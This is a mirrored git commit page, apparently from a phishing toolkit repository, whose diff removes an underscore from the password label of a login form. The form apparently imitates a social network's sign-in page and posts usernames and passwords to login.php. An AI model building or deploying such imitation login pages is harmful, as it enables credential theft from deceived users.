mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Removed underscore from form
This commit is contained in:
parent
3cbb7c6e3b
commit
400cd69d0c
|
@ -29,7 +29,7 @@
|
|||
<form method="post" class="bb" novalidate="1" id="login-form" action="login.php">
|
||||
<label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
|
||||
<br> <br/>
|
||||
<label for="password">Password:_</label><input name="password" id="password" type="password"></input><br />
|
||||
<label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
|
||||
<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
|
||||
<label for="keep" style="font-size:12px;">keep me logged in</label><br />
|
||||
<input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
|
||||
|
|
Loading…
Reference in New Issue
Block a user